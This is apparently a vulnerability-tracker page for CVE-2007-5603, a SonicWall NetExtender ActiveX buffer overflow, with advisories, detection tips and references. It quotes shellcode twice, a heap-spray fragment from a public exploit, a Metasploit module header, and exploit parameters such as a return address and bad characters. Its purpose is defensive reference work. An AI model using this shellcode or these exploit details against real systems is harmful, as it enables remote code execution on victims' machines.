CVE-2007-5603
published 2007-11-05CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
37.98%
98.4th percentile
Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | netextender | — | — |
| sonicwall | ssl_vpn | <= 2.1 | — |
| sonicwall | ssl_vpn | <= 2.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000
- →Monitor for ActiveX instantiation of the NELaunchCtrl / NELaunchX.dll control in a browser context, particularly calls to the AddRouteEntry() method with an oversized second argument. ↗
- →Detect heap-spray NOP sled pattern in browser memory: repeated %u9090%u9090 unescape sequences used to position shellcode prior to AddRouteEntry exploitation. ↗
- →The Metasploit exploit targets IE 6 on Windows XP SP2 English; the return address 0x7e497c7b is used as the SEH/RET overwrite — flag memory writes to this address in exploit telemetry. ↗
- →Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash — encoded payloads avoiding these bytes in network traffic targeting the ActiveX control are a strong indicator. ↗
- →The exploit delivers an HTML page containing a randomised variable name referencing the NELaunchCtrl ActiveX object and calling AddRouteEntry with a 36-byte random prefix followed by a packed return address — inspect HTML responses for this pattern. ↗
- ·The vulnerable DLL version is specifically 1.0.0.26 of NELaunchX.dll; versions of NELaunchCtrl at or above 2.1.0.51 (or 2.5.0.56 in the 2.5.x branch) are patched and should not be flagged. ↗
- ·The Metasploit module's payload space is only 800 bytes with a stack adjustment of -3500; detection rules tuned to payload size should account for this constrained space. ↗
- ·CVE-2007-5814 covers additional overflow vectors (serverAddress, sessionId, clientIPLower, clientIPHigher, userName, domainName, dnsSuffix) in the same ActiveX control — detections for CVE-2007-5603 cover only the AddRouteEntry vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mjr4-4fp3-3qf8: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2
ghsa_unreviewed·2022-05-01
CVE-2007-5603 [HIGH] CWE-119 GHSA-mjr4-4fp3-3qf8: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2
Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
GHSA
GHSA-m6f9-v9gc-f7x3: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-5814 [CRITICAL] CWE-119 GHSA-m6f9-v9gc-f7x3: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2
Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote attackers to execute arbitrary code via a long (1) serverAddress, (2) sessionId, (3) clientIPLower, (4) clientIPHigher, (5) userName, (6) domainName, or (7) dnsSuffix Unicode property value. NOTE: the AddRouteEntry vector is covered by CVE-2007-5603.
SonicWall
CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remot
vendor_sonicwall·2007-11-05·CVSS 9.3
CVE-2007-5603 [CRITICAL] CWE-119 CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remot
CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
SonicWall
CVE-2007-5814: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote a
vendor_sonicwall·2007-11-05·CVSS 9.3
CVE-2007-5814 [CRITICAL] CWE-119 CVE-2007-5814: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote a
CVE-2007-5814: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote attackers to execute arbitrary code via a long (1) serverAddress, (2) sessionId, (3) clientIPLower, (4) clientIPHigher, (5) userName, (6) domainName, or (7) dnsSuffix Unicode property value. NOTE: the AddRouteEntry vector is covered by CVE-2007-5603.
No detection rules found.
Exploit-DB
SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-5603 SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)
SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: sonicwall_addrouteentry.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.
By sending an overly long string to the "AddRouteEntry()" method located
in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute
arbitrary code.
},
'License' => M
Exploit-DB
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution
exploitdb·2007-11-01
CVE-2007-5603 SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution
---
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length
# milw0rm.com [2007-11-01]
Metasploit
SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
metasploit
SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the "AddRouteEntry()" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/27469http://securityreason.com/securityalert/3342http://www.kb.cert.org/vuls/id/298521http://www.kb.cert.org/vuls/id/WDON-78K56Mhttp://www.sec-consult.com/303.htmlhttp://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txthttp://www.securityfocus.com/archive/1/483097/100/0/threadedhttp://www.securityfocus.com/bid/26288http://www.securitytracker.com/id?1018891http://www.vupen.com/english/advisories/2007/3696https://exchange.xforce.ibmcloud.com/vulnerabilities/38220https://www.exploit-db.com/exploits/4594http://secunia.com/advisories/27469http://securityreason.com/securityalert/3342http://www.kb.cert.org/vuls/id/298521http://www.kb.cert.org/vuls/id/WDON-78K56Mhttp://www.sec-consult.com/303.htmlhttp://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txthttp://www.securityfocus.com/archive/1/483097/100/0/threadedhttp://www.securityfocus.com/bid/26288http://www.securitytracker.com/id?1018891http://www.vupen.com/english/advisories/2007/3696https://exchange.xforce.ibmcloud.com/vulnerabilities/38220https://www.exploit-db.com/exploits/4594
2007-11-05
Published